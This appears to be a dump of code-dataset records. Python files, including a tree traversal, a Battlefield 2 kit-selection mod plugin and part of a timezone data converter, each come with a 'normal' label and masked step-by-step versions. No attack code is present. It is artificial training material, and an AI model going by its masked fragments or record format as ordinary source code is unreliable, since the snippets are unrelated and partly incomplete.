"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
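The preprocessing in this record is Python 2 and tied to the Kaggle SF-crime columns. A small Python 3 sketch of its core idea, splitting the timestamp into parts and one-hot encoding a categorical column with pandas, is shown below; the column names follow the record, the sample rows are made up:

import pandas as pd

df = pd.DataFrame({
    'Dates': ['2015-05-13 23:53:00', '2015-05-13 08:10:00'],
    'PdDistrict': ['NORTHERN', 'MISSION'],
})

# Split the timestamp into hour/day/month/year features.
dates = pd.to_datetime(df['Dates'])
df['hour'] = dates.dt.hour
df['day'] = dates.dt.day
df['month'] = dates.dt.month
df['year'] = dates.dt.year

# One-hot encode the district, as pd.get_dummies does in the record.
df = pd.concat([df, pd.get_dummies(df['PdDistrict'], prefix='pD')], axis=1)
df = df.drop(['Dates', 'PdDistrict'], axis=1)
print(df.head())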
#! /usr/bin/env python
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
normal
|
{
"blob_id": "7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8",
"index": 6326,
"step-1": "<mask token>\n",
"step-2": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\n<mask token>\n",
"step-3": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\n<mask token>\n",
"step-4": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-5": "\n#! /usr/bin/env python\n\ndef get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class Solution:
def levelOrder(self, root):
if root is None:
return []
currentList = [root]
nextList = []
solution = []
while currentList:
thisLevel = [node.val for node in currentList]
solution.append(thisLevel)
for node in currentList:
if node.left is not None:
nextList.append(node.left)
if node.right is not None:
nextList.append(node.right)
currentList, nextList = nextList, currentList
del nextList[:]
return solution
|
normal
|
{
"blob_id": "d9f176262dcaf055414fbc43b476117250249b63",
"index": 4696,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def levelOrder(self, root):\n if root is None:\n return []\n currentList = [root]\n nextList = []\n solution = []\n while currentList:\n thisLevel = [node.val for node in currentList]\n solution.append(thisLevel)\n for node in currentList:\n if node.left is not None:\n nextList.append(node.left)\n if node.right is not None:\n nextList.append(node.right)\n currentList, nextList = nextList, currentList\n del nextList[:]\n return solution\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
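A quick way to exercise the level-order traversal above is with a minimal node class; TreeNode below is an assumption (the record does not define one), and Solution is taken to be the class from this record in the same module:

class TreeNode:
    def __init__(self, val, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


#       1
#      / \
#     2   3
#    /
#   4
root = TreeNode(1, TreeNode(2, TreeNode(4)), TreeNode(3))
print(Solution().levelOrder(root))  # expected: [[1], [2, 3], [4]]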
# -*- coding: iso-8859-15 -*-
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@8:........C@@@
# @@@@@@@@@@@@@@88@@@@@@@@@@@@@@@@@@@@@@88@@@@@@@@@@888@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@O:...........:C@
# @ .@O O@8 C@@O o@@@: cO oc 8o .@@. @c....:O@@:....:@
# @ .:c8 CO O8 :o O8 oO C@. :8. :::. ..::. ::Cc ..:8o o@: @o....:8@@:....:@
# @ c@@@O OO C8 c@ OO o8 c@. :@. :@@C O@@@@. :@@@c 8@@@@@@@@@@@@: @@@@@@@@@O.....:@
# @ ..oO OO C8 .@O o@@@@@@@. :@. :@@C O@@@@. :@@@c :C8@@@o O@@ccC @@@@@@@O.......c@
# @ oO OO C8 C@O o. c8. :@. :@@8OOCo8@@@@. :@@@8@@@@@@O@@@@@@@8C: @@@@@C.......o@@@
# @ c@@@O OO C8 c8 OO oO c@. :@. o@@@@@@@@@@@@@@@@@@@@@o 8@@@o ..o @@@C......:C@@@@@
# @ c@@@O CO C8 c8 OO o@. c@. :@..o8@@@@@@@@@@@@@@@@Oc@@@c 8@@@o oo @C......:O@@@@@@@
# @ c@@@@ .. 88 c8 O@. .: c@c :o@@@@@@@@@@@@@@@@@@@@@@@@Ooc:: Co o@. @c....:O@@@@@@@@@
# @ c@@@@@o o@@8 c@ O@@o cc c@@O. c@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@: Co o@O @c....:O8@@@@@@@@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:C@:C:..:C.:.:c.:.@o.............:@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:o o.oo o ooCc.oC@c.............:@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# NCOrifle.py -- Support for squadleaders being able to choose between smg and rifle.
#
# ©2010 Spit for Forgotten Hope
import host, bf2
from game.gameplayPlugin import base
from game.utilities import rconExec, getCurrentRound
from NCOrifleData import NCO_kits
DEBUG = 0
class NCOrifle(base):
def round_start(self, hooker):
self.watched_players = []
self.choices = {}
self.spawned = []
self.spawned_dict = {}
if not hooker.hasHook('RemoteCommand', self.onRemoteCommand):
hooker.register('RemoteCommand', self.onRemoteCommand)
hooker.register('PlayerSpawn', self.onPlayerSpawn)
hooker.register('PickupKit', self.onPickupKit)
if DEBUG: print 'NCOrifle: hooks registered'
else:
if DEBUG: print 'NCOrifle: hooks already registered'
def onRemoteCommand(self, playerid, cmd):
if not (cmd == 'ncosmg' or cmd == 'ncorifle' or cmd.startswith('selectkit')): return
if playerid == -1: playerid = 255
player = bf2.playerManager.getPlayerByIndex(playerid)
if DEBUG: print 'NCOrifle: player %s executed rcon command "%s"' % (player.getName(), cmd)
if cmd.startswith('selectkit'):
if cmd.endswith('6'):
self.addPlayer(player)
else:
self.removePlayer(player)
if cmd == 'ncorifle':
self.choices[player] = 'rifle'
if DEBUG: print 'NCOrifle: player %s has chosen a rifle to spawn with' % player.getName()
elif cmd == 'ncosmg':
self.choices[player] = 'smg'
if DEBUG: print 'NCOrifle: player %s has chosen an smg to spawn with' % player.getName()
def onPickupKit(self, player, kit):
if player not in self.spawned: return
def_kit = self.getData(player)
if def_kit is None: return
if DEBUG: print 'Setting NCO kit back to default for team %d' % player.getTeam()
self.setKit(def_kit, player.getTeam(), self.spawned_dict[player])
self.spawned.remove(player)
self.spawned_dict[player] = None
def onPlayerSpawn(self, player, soldier):
try:
self._onPlayerSpawn(player, soldier)
except Exception, e:
print 'NCOrifle exception', e
def getData(self, player):
map, gamemode, size = getCurrentRound()
if map in NCO_kits.keys():
def_kit1, def_kit2 = NCO_kits[map]
exec('def_kit = def_kit%d' % player.getTeam())
return def_kit
else:
print 'NCOrifle: Can\'t find NCO kit info for map %s. Update NCOrifleData.py or provide custom map info via mapdata.py' % map
return None
def _onPlayerSpawn(self, player, soldier):
if player not in self.watched_players: return
def_kit = None
def_kit = self.getData(player)
if def_kit is None: return
if player not in self.choices.keys():
self.setKit(def_kit, player.getTeam(), soldier.templateName)
elif self.choices[player] == 'smg':
self.setKit(def_kit, player.getTeam(), soldier.templateName)
elif self.choices[player] == 'rifle':
if DEBUG: print 'NCOrifle: player %s wants to spawn with a modified NCO kit...' % player.getName()
kit = def_kit + '_rifle'
self.setKit(kit, player.getTeam(), soldier.templateName)
if player in self.spawned: return
self.spawned.append(player)
self.spawned_dict[player] = soldier.templateName
def setKit(self, kit, team, soldier):
rconExec('gameLogic.setKit %d 6 "%s" "%s"' % (team, kit, soldier))
if DEBUG: print 'NCOrifle: Set NCO kit for team %d to %s, %s' % (team, kit, soldier)
def addPlayer(self, player):
if player not in self.watched_players:
self.watched_players.append(player)
if DEBUG: print 'NCOrifle: added player %s to watched players list' % player.getName()
def removePlayer(self, player):
if player in self.watched_players:
self.watched_players.remove(player)
if DEBUG: print 'NCOrifle: removed player %s from watched players list' % player.getName()
|
normal
|
{
"blob_id": "f105ecb8229020554930bb4f0e00ecf88e83f5ae",
"index": 4288,
"step-1": "# -*- coding: iso-8859-15 -*-\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@8:........C@@@\r\n# @@@@@@@@@@@@@@88@@@@@@@@@@@@@@@@@@@@@@88@@@@@@@@@@888@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@O:...........:C@\r\n# @ .@O O@8 C@@O o@@@: cO oc 8o .@@. @c....:O@@:....:@\r\n# @ .:c8 CO O8 :o O8 oO C@. :8. :::. ..::. ::Cc ..:8o o@: @o....:8@@:....:@\r\n# @ c@@@O OO C8 c@ OO o8 c@. :@. :@@C O@@@@. :@@@c 8@@@@@@@@@@@@: @@@@@@@@@O.....:@\r\n# @ ..oO OO C8 .@O o@@@@@@@. :@. :@@C O@@@@. :@@@c :C8@@@o O@@ccC @@@@@@@O.......c@\r\n# @ oO OO C8 C@O o. c8. :@. :@@8OOCo8@@@@. :@@@8@@@@@@O@@@@@@@8C: @@@@@C.......o@@@\r\n# @ c@@@O OO C8 c8 OO oO c@. :@. o@@@@@@@@@@@@@@@@@@@@@o 8@@@o ..o @@@C......:C@@@@@\r\n# @ c@@@O CO C8 c8 OO o@. c@. :@..o8@@@@@@@@@@@@@@@@Oc@@@c 8@@@o oo @C......:O@@@@@@@\r\n# @ c@@@@ .. 88 c8 O@. .: c@c :o@@@@@@@@@@@@@@@@@@@@@@@@Ooc:: Co o@. @c....:O@@@@@@@@@\r\n# @ c@@@@@o o@@8 c@ O@@o cc c@@O. c@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@: Co o@O @c....:O8@@@@@@@@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:C@:C:..:C.:.:c.:.@o.............:@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:o o.oo o ooCc.oC@c.............:@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n#\r\n# NCOrifle.py -- Support for squadleaders being able to choose between smg and rifle.\r\n#\r\n# ©2010 Spit for Forgotten Hope\r\n\r\nimport host, bf2\r\nfrom game.gameplayPlugin import base\r\nfrom game.utilities import rconExec, getCurrentRound\r\nfrom NCOrifleData import NCO_kits\r\n\r\nDEBUG = 0\r\n\r\nclass NCOrifle(base):\r\n def round_start(self, hooker):\r\n self.watched_players = []\r\n self.choices = {}\r\n self.spawned = []\r\n self.spawned_dict = {}\r\n \r\n if not hooker.hasHook('RemoteCommand', self.onRemoteCommand):\r\n hooker.register('RemoteCommand', self.onRemoteCommand)\r\n hooker.register('PlayerSpawn', self.onPlayerSpawn)\r\n hooker.register('PickupKit', self.onPickupKit)\r\n if DEBUG: print 'NCOrifle: hooks registered'\r\n else:\r\n if DEBUG: print 'NCOrifle: hooks already registered'\r\n \r\n def onRemoteCommand(self, playerid, cmd):\r\n if not (cmd == 'ncosmg' or cmd == 'ncorifle' or cmd.startswith('selectkit')): return\r\n if playerid == -1: playerid = 255\r\n player = bf2.playerManager.getPlayerByIndex(playerid)\r\n if DEBUG: print 'NCOrifle: player %s executed rcon command \"%s\"' % (player.getName(), cmd)\r\n \r\n if cmd.startswith('selectkit'):\r\n if cmd.endswith('6'):\r\n self.addPlayer(player)\r\n else:\r\n self.removePlayer(player)\r\n \r\n if cmd == 'ncorifle':\r\n self.choices[player] = 'rifle'\r\n if DEBUG: print 'NCOrifle: player %s has chosen a rifle to spawn with' % player.getName() \r\n elif cmd == 'ncosmg':\r\n self.choices[player] = 'smg'\r\n if DEBUG: print 'NCOrifle: player %s has chosen an smg to spawn with' % player.getName()\r\n \r\n def onPickupKit(self, player, kit):\r\n if player not in self.spawned: return\r\n def_kit = self.getData(player)\r\n if def_kit is None: return\r\n if DEBUG: print 'Setting NCO kit back to default for team %d' % player.getTeam()\r\n self.setKit(def_kit, player.getTeam(), self.spawned_dict[player])\r\n self.spawned.remove(player)\r\n self.spawned_dict[player] = None\r\n \r\n def onPlayerSpawn(self, player, 
soldier):\r\n try:\r\n self._onPlayerSpawn(player, soldier)\r\n except Exception, e:\r\n print 'NCOrifle exception', e\r\n \r\n def getData(self, player):\r\n map, gamemode, size = getCurrentRound()\r\n if map in NCO_kits.keys():\r\n def_kit1, def_kit2 = NCO_kits[map]\r\n exec('def_kit = def_kit%d' % player.getTeam())\r\n return def_kit\r\n else:\r\n print 'NCOrifle: Can\\'t find NCO kit info for map %s. Update NCOrifleData.py or provide custom map info via mapdata.py' % map\r\n return None\r\n \r\n def _onPlayerSpawn(self, player, soldier):\r\n if player not in self.watched_players: return\r\n def_kit = None\r\n \r\n def_kit = self.getData(player)\r\n \r\n if def_kit is None: return\r\n \r\n if player not in self.choices.keys():\r\n self.setKit(def_kit, player.getTeam(), soldier.templateName)\r\n elif self.choices[player] == 'smg':\r\n self.setKit(def_kit, player.getTeam(), soldier.templateName)\r\n \r\n elif self.choices[player] == 'rifle':\r\n if DEBUG: print 'NCOrifle: player %s wants to spawn with a modified NCO kit...' % player.getName()\r\n kit = def_kit + '_rifle'\r\n self.setKit(kit, player.getTeam(), soldier.templateName)\r\n \r\n if player in self.spawned: return\r\n self.spawned.append(player)\r\n self.spawned_dict[player] = soldier.templateName\r\n \r\n def setKit(self, kit, team, soldier):\r\n rconExec('gameLogic.setKit %d 6 \"%s\" \"%s\"' % (team, kit, soldier))\r\n if DEBUG: print 'NCOrifle: Set NCO kit for team %d to %s, %s' % (team, kit, soldier)\r\n \r\n def addPlayer(self, player):\r\n if player not in self.watched_players:\r\n self.watched_players.append(player)\r\n if DEBUG: print 'NCOrifle: added player %s to watched players list' % player.getName()\r\n \r\n def removePlayer(self, player):\r\n if player in self.watched_players:\r\n self.watched_players.remove(player)\r\n if DEBUG: print 'NCOrifle: removed player %s from watched players list' % player.getName()\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
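The plugin in this record relies on an event-hook registry supplied by the Battlefield 2 modding runtime (host/bf2), whose API is game-specific. A plain-Python sketch of the same register-and-dispatch idea, with every name invented for illustration, might look like:

class Hooker:
    """Tiny event registry mimicking the hasHook/register calls used above."""

    def __init__(self):
        self._hooks = {}

    def hasHook(self, event, callback):
        return callback in self._hooks.get(event, [])

    def register(self, event, callback):
        self._hooks.setdefault(event, []).append(callback)

    def fire(self, event, *args):
        for callback in self._hooks.get(event, []):
            callback(*args)


hooker = Hooker()
hooker.register('PlayerSpawn', lambda player: print(f'{player} spawned'))
hooker.fire('PlayerSpawn', 'Spit')  # prints: Spit spawned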
# -*- coding:utf-8 -*-
import json
from datetime import datetime
from math import ceil, floor
from os.path import abspath, join, pardir
from struct import pack
from .global_settings import (
DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,
NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,
)
# # # keep in mind: the faster numba optimized helper fct. cannot be used here,
# # # because numpy classes are not being used at this stage yet!
from .helpers import coord2int, inside_polygon, int2coord
# from helpers import coord2int, inside_polygon, int2coord
# from global_settings import (
# DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,
# NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,
# )
# import sys
# from os.path import dirname
#
# sys.path.insert(0, dirname(__file__))
# from helpers import coord2int, int2coord, inside_polygon
"""
TODO write tests
USE INSTRUCTIONS:
- download the latest timezones.geojson.zip file from github.com/evansiroky/timezone-boundary-builder/releases
- unzip and place the combined.json inside this timezonefinder folder
- run this file_converter.py as a script until the compilation of the binary files is completed.
IMPORTANT: all coordinates (floats) are being converted to int32 (multiplied by 10^7). This makes computations faster
and it takes a lot less space, without losing too much accuracy (min accuracy (=at the equator) is still 1 cm!)
B = unsigned char (1byte = 8bit Integer)
H = unsigned short (2 byte integer)
I = unsigned 4byte integer
i = signed 4byte integer
Binaries being written:
[POLYGONS:] there are approx. 1k Polygons (evansiroky/timezone-boundary-builder 2017a)
poly_zone_ids: the related zone_id for every polygon ('<H')
poly_coord_amount: the amount of coordinates in every polygon ('<I')
poly_adr2data: address in poly_data.bin where data for every polygon starts ('<I')
poly_max_values: boundaries for every polygon ('<iiii': xmax, xmin, ymax, ymin)
poly_data: coordinates for every polygon (multiple times '<i') (for every polygon first all x then all y values!)
poly_nr2zone_id: the polygon number of the first polygon from every zone('<H')
[HOLES:] number of holes (162 evansiroky/timezone-boundary-builder 2018d)
hole_poly_ids: the related polygon_nr (=id) for every hole ('<H')
hole_coord_amount: the amount of coordinates in every hole ('<H')
hole_adr2data: address in hole_data.bin where data for every hole starts ('<I')
hole_data: coordinates for every hole (multiple times '<i')
[SHORTCUTS:] the surface of the world is split up into a grid of shortcut rectangles.
-> there are a total of 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT shortcuts
shortcut here means storing for every cell in a grid of the world map which polygons are located in that cell
they can therefore be used to drastically reduce the amount of polygons which need to be checked in order to
decide which timezone a point is located in.
the list of polygon ids in each shortcut is sorted by frequency of appearance of their zone id
this is critical for ruling out zones faster (as soon as just polygons of one zone are left this zone can be returned)
shortcuts_entry_amount: the amount of polygons for every shortcut ('<H')
shortcuts_adr2data: address in shortcut_data.bin where data for every shortcut starts ('<I')
shortcuts_data: polygon numbers (ids) for every shortcut (multiple times '<H')
shortcuts_unique_id: the zone id if only polygons from one zone are present,
a high number (with no corresponding zone) if not ('<H').
the majority of zones either have no polygons at all (sea) or just one zone.
this zone then can be instantly returned without actually testing polygons.
also stored extra binary if only one zone (to directly return that zone without checking)
statistics: (data version 2018g)
maximal amount of coordinates in one polygon: 139130
amount_of_holes: 219
amount of polygons: 1177
shortcut statistics:
highest entry amount is 46
frequencies of entry amounts (from 0 to max entries):
[76359, 45216, 7204, 710, 81, 17, 4, 1, 3, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
relative accumulated frequencies [%]:
[58.92, 93.81, 99.37, 99.91, 99.98, 99.99, 99.99, 99.99, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,
100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,
100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]
[41.08, 6.19, 0.63, 0.09, 0.02, 0.01, 0.01, 0.01, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0]
58.92 % of all shortcuts are empty
highest amount of different zones in one shortcut is 7
frequencies of entry amounts (from 0 to max):
[76359, 45555, 6963, 672, 43, 6, 1, 1]
relative accumulated frequencies [%]:
[58.92, 94.07, 99.44, 99.96, 99.99, 100.0, 100.0, 100.0]
[41.08, 5.93, 0.56, 0.04, 0.01, 0.0, 0.0, 0.0]
--------------------------------
The number of filled shortcut zones are: 53241 (= 41.08 % of all shortcuts)
The number of polygons is: 1177
The number of floats in all the polygons is (2 per point): 10887056
writing file " poly_nr2zone_id.bin "
Done
writing file " poly_zone_ids.bin "
writing file " poly_max_values.bin "
writing file " poly_data.bin "
writing file " poly_adr2data.bin "
writing file " poly_coord_amount.bin "
writing file " shortcuts_entry_amount.bin "
writing file " shortcuts_adr2data.bin "
writing file " shortcuts_data.bin "
writing file " shortcuts_unique_id.bin "
writing file " hole_poly_ids.bin "
writing file " hole_coord_amount.bin "
writing file " hole_adr2data.bin "
writing file " hole_data.bin "
the polygon data makes up 97.11 % of the data
the shortcuts make up 2.01 % of the data
holes make up 0.88 % of the data
"""
nr_of_lines = -1
all_tz_names = []
poly_zone_ids = []
all_boundaries = []
all_coords = []
all_lengths = []
amount_of_holes = 0
polynrs_of_holes = []
all_holes = []
all_hole_lengths = []
list_of_pointers = []
poly_nr2zone_id = []
shortcuts = {}
def x_shortcut(lng):
# higher (=lng) means higher x shortcut!!! 0 (-180deg lng) -> 360 (180deg)
# if lng < -180 or lng >= 180:
# raise ValueError('longitude out of bounds', lng)
return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)
def y_shortcut(lat):
# lower y (=lat) means higher y shortcut!!! 0 (90deg lat) -> 180 (-90deg)
# if lat < -90 or lat >= 90:
# raise ValueError('this latitude is out of bounds', lat)
return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)
def big_zone(xmax, xmin, ymax, ymin):
# returns True if a zone with those boundaries could have more than 4 shortcuts
return xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 / NR_SHORTCUTS_PER_LAT
def percent(numerator, denominator):
return round((numerator / denominator) * 100, 2)
def accumulated_frequency(int_list):
out = []
total = sum(int_list)
acc = 0
for e in int_list:
acc += e
out.append(percent(acc, total))
return out
def ints_of(line=0):
x_coords, y_coords = all_coords[line]
return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]
def contained(x, y, x_coords, y_coords):
return inside_polygon(x, y, [x_coords, y_coords])
def unique(iterable):
out = []
for i in iterable:
if i not in out:
out.append(i)
return out
def point_between(p1, p2):
return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2
def get_shortcuts(x, y):
result = shortcuts.get((x, y))
if result is None:
return []
else:
return result
def _polygons(id_list):
for i in id_list:
yield all_coords[i]
def not_empty(iterable):
for i in iterable:
return True
return False
def polys_of_one_zone():
for i in range(len(timezone_names)):
start = poly_nr2zone_id[i]
end = poly_nr2zone_id[i + 1]
yield list(range(start, end))
def replace_entry(iterable, entry, substitute):
for i in range(len(iterable)):
if iterable[i] == entry:
iterable[i] = substitute
return iterable
def _holes_in_poly(poly_nr):
i = 0
for nr in polynrs_of_holes:
if nr == poly_nr:
yield all_holes[i]
i += 1
def parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):
global amount_of_holes
global nr_of_lines
global poly_zone_ids
print('Parsing data from {}\nthis could take a while...\n'.format(path))
tz_list = json.loads(open(path).read()).get('features')
# this counter just counts polygons, not holes!
polygon_counter = 0
current_zone_id = 0
print('holes found at: (poly_nr zone_name)')
for tz_dict in tz_list:
if DEBUG and polygon_counter > DEBUG_POLY_STOP:
break
tz_name = tz_dict.get('properties').get("tzid")
# print(tz_name)
all_tz_names.append(tz_name)
geometry = tz_dict.get("geometry")
if geometry.get('type') == 'MultiPolygon':
# depth is 4
multipolygon = geometry.get("coordinates")
else:
# depth is 3 (only one polygon, possibly with holes!)
multipolygon = [geometry.get("coordinates")]
# multipolygon has depth 4
# assert depth_of_array(multipolygon) == 4
for poly_with_hole in multipolygon:
# assert len(poly_with_hole) > 0
# the first entry is polygon
x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))
# IMPORTANT: do not use the last value (is equal to the first)!
x_coords = list(x_coords)
y_coords = list(y_coords)
x_coords.pop(-1)
y_coords.pop(-1)
all_coords.append((x_coords, y_coords))
# assert len(x_coords) > 0
all_lengths.append(len(x_coords))
all_boundaries.append((max(x_coords), min(x_coords), max(y_coords), min(y_coords)))
poly_zone_ids.append(current_zone_id)
# everything else is interpreted as a hole!
for hole in poly_with_hole:
print(polygon_counter, tz_name)
# keep track of how many holes there are
amount_of_holes += 1
polynrs_of_holes.append(polygon_counter)
x_coords, y_coords = list(zip(*hole))
# IMPORTANT: do not use the last value (is equal to the first)!
x_coords = list(x_coords)
y_coords = list(y_coords)
x_coords.pop(-1)
y_coords.pop(-1)
all_holes.append((x_coords, y_coords))
all_hole_lengths.append(len(x_coords))
polygon_counter += 1
current_zone_id += 1
if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):
# 34621 in tz_world 2016d (small enough for int16)
# 137592 in evansiroky/timezone-boundary-builder 2017a (now int32 is needed!)
raise ValueError('amount of coords cannot be represented by int32 in poly_coord_amount.bin:',
max(all_lengths))
if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):
# 21071 in evansiroky/timezone-boundary-builder 2017a (int16 still enough)
raise ValueError('amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:',
max(all_hole_lengths))
nr_of_lines = len(all_lengths)
if polygon_counter != nr_of_lines:
raise ValueError('polygon counter and entry number in all_length is different:', polygon_counter, nr_of_lines)
if nr_of_lines >= 2 ** (8 * NR_BYTES_H):
# 24k in tz_world 2016d
# 1022 in evansiroky/timezone-boundary-builder 2017a
raise ValueError('polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are',
nr_of_lines, 'polygons')
if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):
# 420 different zones in evansiroky/timezone-boundary-builder 2017a
# used in shortcuts_unique_id and poly_zone_ids
raise ValueError('zone id cannot be encoded as char (int8). the last id is',
poly_zone_ids[-1])
if 0 in all_lengths:
raise ValueError()
print('... parsing done.')
print('maximal amount of coordinates in one polygon:', max(all_lengths))
print('amount_of_holes:', amount_of_holes)
print('amount of polygons:', nr_of_lines)
print('\n')
def update_zone_names(path=TIMEZONE_NAMES_FILE):
global poly_zone_ids
global list_of_pointers
global all_boundaries
global all_coords
global all_lengths
global polynrs_of_holes
print('updating the zone names in {} now...'.format(path))
# pickle the zone names (python array)
with open(abspath(path), 'w') as f:
f.write(json.dumps(all_tz_names))
print('...Done.\n\nComputing where zones start and end...')
i = 0
last_id = -1
for zone_id in poly_zone_ids:
if zone_id != last_id:
poly_nr2zone_id.append(i)
if zone_id < last_id:
raise ValueError()
last_id = zone_id
i += 1
poly_nr2zone_id.append(i)
print('...Done.\n')
def compile_binaries():
global nr_of_lines
global shortcuts
def print_shortcut_statistics():
frequencies = []
max_val = max(*nr_of_entries_in_shortcut)
print('shortcut statistics:')
print('highest entry amount is', max_val)
while max_val >= 0:
frequencies.append(nr_of_entries_in_shortcut.count(max_val))
max_val -= 1
frequencies.reverse()
print('frequencies of entry amounts (from 0 to max entries):')
print(frequencies)
empty_shortcuts = frequencies[0]
print('relative accumulated frequencies [%]:')
acc = accumulated_frequency(frequencies)
print(acc)
print([round(100 - x, 2) for x in acc])
print(percent(empty_shortcuts, amount_of_shortcuts), '% of all shortcuts are empty\n')
amount_of_different_zones = []
for entry in shortcut_entries:
registered_zone_ids = []
for polygon_nr in entry:
id = poly_zone_ids[polygon_nr]
if id not in registered_zone_ids:
registered_zone_ids.append(id)
amount_of_different_zones.append(len(registered_zone_ids))
frequencies = []
max_val = max(*amount_of_different_zones)
print('highest amount of different zones in one shortcut is', max_val)
while max_val >= 1:
frequencies.append(amount_of_different_zones.count(max_val))
max_val -= 1
# show the proper amount of shortcuts with 0 zones (=nr of empty shortcuts)
frequencies.append(empty_shortcuts)
frequencies.reverse()
print('frequencies of entry amounts (from 0 to max):')
print(frequencies)
print('relative accumulated frequencies [%]:')
acc = accumulated_frequency(frequencies)
print(acc)
print([round(100 - x, 2) for x in acc])
print('--------------------------------\n')
def included_shortcut_row_nrs(max_lat, min_lat):
return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))
def included_shortcut_column_nrs(max_lng, min_lng):
return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))
def longitudes_to_check(max_lng, min_lng):
output_list = []
step = 1 / NR_SHORTCUTS_PER_LNG
current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG
